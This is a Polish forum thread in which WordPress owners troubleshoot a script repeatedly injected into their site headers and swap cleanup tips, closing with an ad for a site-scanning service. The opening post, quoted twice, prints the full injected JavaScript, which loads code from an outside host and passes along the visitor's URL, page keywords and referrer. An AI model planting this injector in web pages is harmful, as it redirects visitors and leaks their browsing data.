Skocz do zawartości
murgal

Wordpress i malware

Polecane posty

Cześć,

 

 

Mam problem - na moich stronach na wordpressie co jakiś czas coś dokleja skrypt do headera, np:

 

 

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://xdeep.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'J18171' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

 

 

 

Po usunięciu jest kilka dni spokoju potem powtórka. Kojarzycie co może dodawać takie śmieci?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Najpewniej masz dziurawego Wordpressa albo któryś z pluginów. Albo ściągnąłeś płatny szablon za darmo, to jest już trop.

 

Pewnie masz otwartego backdoor shella, przeszukaj serwer. Ale bez doświadczenia i umiejętności to trochę szukanie igły w stogu siana.

 

https://pl.wordpress.org/plugins/gotmls/ Spróbuj tym.

 

Edytowano przez aTastyCookie (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Mam płatny szablon lecz w 100% legalny ( z templatemonster ).

 

Pogadam z moim dostawcą hostingu - ViPower, może grepem przeskanują (pewnie jakiś eval).

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

No i co dalej, jak już "eval" znajdziesz? Jakoś musieli to dokleić.
Przenieś sobie to na VPS'a tymczasowo, podbij poziom logów w serwerze WWW (być może nawet poziom debug i treść żądań się przyda), zastaw TripWire i pilnuj momentu, w którym skrypty zostaną podmienione.

Uleczyłem tak jednego Wordpressa (z pomocą programisty, który go wdrażał). Dosyć wygodnie i skutecznie.

  • Upvote 1

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Doklejony został przez popieprzone uprawnienia, na 99%.

 

Jednego wordpressa wpuśiłem na VPSa i mocno loguje ruch, ale jak na złośc ten czysty.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Cześć,

 

 

Mam problem - na moich stronach na wordpressie co jakiś czas coś dokleja skrypt do headera, np:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://xdeep.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'J18171' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Po usunięciu jest kilka dni spokoju potem powtórka. Kojarzycie co może dodawać takie śmieci?

 

Dokladnie mam ten sam problem i chcialem wlasnie zalozyc tu temat z tym problemem.

Dokleja mi do headera powyzszy kod z losowymi stronami i nie dosc, ze to spowalnia stronę o nawet 10s to nawet mozna miec zablokowaną stronę przez prawdopodobnie wirusy na stronie.

 

Ten kod się dokleja co kilka godzin, nie co kilka dni...

 

E:

ustawilem chmody na 600 dla header.php i sprawdze czy doklei ponownie

No i znalazlem dziwne nazwy uzytkownikow z prawami administratora, np. wp.service.controller

Oczywiscie rejestracja na mojej stronie jest wylaczona. Warto sprawdzic

Edytowano przez Diego164 (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

w panelu.

W nocy sie meczylem z tym, myslalem ze rozwiazalem problem i znowu rano dokleilo na 8 wordpressach jednoczesnie (WTF?) ten syf do header.php

 

Robilem aktualizacje, wszystkie wtyczki, pobralem 2 wtyczki do skanowania syfu i troche tego sie nazbieralo, ale pousuwalem tylko, ze jedna wtyczka pokazywala swoja czesc problemow a ta druga swoja czesc i wydaje mi sie, ze nadal mam ten syf, ale najpierw to polecalbym Tobie zainstalowac te wtyczki:

Wordfence Security

i

Sucuri Security - Auditing, Malware Scanner and Hardening

 

i ponaprawiaj te bledy co Tobie wyjdą po skanowaniu, bo pewnie bedziesz mial backdoory jak ja. Tyle mogę narazie powiedziec, ja dalej szukam zrodlo tego syfu.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Kamikadze

Z poziomu konsoli ale też po przypisaniu uprawnień z przeglądarki. Czemu pytasz?

 

Na przyszłość :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość Kamikadze

No i co dalej, jak już "eval" znajdziesz? Jakoś musieli to dokleić.

Przenieś sobie to na VPS'a tymczasowo, podbij poziom logów w serwerze WWW (być może nawet poziom debug i treść żądań się przyda), zastaw TripWire i pilnuj momentu, w którym skrypty zostaną podmienione.

 

Uleczyłem tak jednego Wordpressa (z pomocą programisty, który go wdrażał). Dosyć wygodnie i skutecznie.

 

 

Głowię się, na co Wam tyle badziewia :P

 

 

Zarzucisz jakimś linkiem żeby o tym poczytać?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Ja użyłem mod_log_forensic + najwyższy poziom logów Apache + TripWire z powiadomieniem mailowym.

Z devem po kolei dochodziliśmy do kolejnych skryptów, które były zasyfione i odpytywane przez szkodników. On je czyścił i tak w kółko - aż do wyrżnięciu ostatnich linijek kodu (źródłem okazała się dziurka w formularzu w jakiejś autorskiej wtyczce).

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

@murgal

 

Masz wtyczke visual composer? Dzis znowu dokleilo mi na PRAWIE wszystkich wordpressach, w tym której nie dokleilo usunąłem wtyczke Visual Composer (zawsze jej uzywam na wszystkich stronach) i nie dokleilo juz nic do header, a na reszcie zrobilem rozne eksperymenty ktore nie zadzialaly, wiec jednak to ta wtyczka ma jakiś syf ktory dokleja ten irytujący skrypt do header.php

 

 

E.:

No i na tamtej stronie co nie dokleilo pousuwalem jeszcze te podstawowe szablony wordpressa (tam tez dokleja), wiec moze tu lezal problem.

Edytowano przez Diego164 (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

U mnie czysto narazie.

 

 

Co do wtyczki, mam :

 

Visual Form Builder oraz MotoPress Content Editor oraz pakiet wtyczek od Cherry, mam template od templatemonster i musiałem to doinstalować.

 

 

Wywaliłem :

 

Contact Forma (nie używam)

Motopress content editor

Pozostałe szablony

 

Ze wszystkich wordpressów.

 

WP Security + Sucuri pouruchamiane i skonfigurowane. Zostawiam tak jak jest, zobaczymy.

Edytowano przez murgal (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Sorry, że odgrzebuje ale może komuś pomoże - stworzyliśmy darmowy antywirus dla Wordpress, Joomla i innych CMSów.

https://webanti.com - zachęcam do przetestowania.

Antywirus stworzyliśmy dlatego, ponieważ wiele osób się do nas zgłaszało z problemem malware na stronie więc tym bardziej zachęcam ponieważ aktualni użytkownicy chwalą. Usługa jest dość młoda - działamy publicznie dopiero od miesiąca.

 

Z tego co widzimy, to konta w większości rejestrują osoby, które już mają wirusa i chcą go usunać, ale zapraszamy do rejestracji jeszcze przed zawirusowaniem, ponieważ główną cechą webanti ma być to aby poinformowało, że coś się stało ze stronę. Więc lepiej działać prewencyjnie.

  • Upvote 1

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

 

 

ponieważ wiele osób się do nas zgłaszało z problemem malware na stronie więc tym bardziej zachęcam ponieważ aktualni użytkownicy chwalą.

 

Pamiętam jak umieściliście na jednej z grup facebookowych dot. tworzenia stron internetowych pytanie:

 

"Kto z was miał problemy z malware na swojej stronie?".

 

Nie było odpowiedzi :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się


×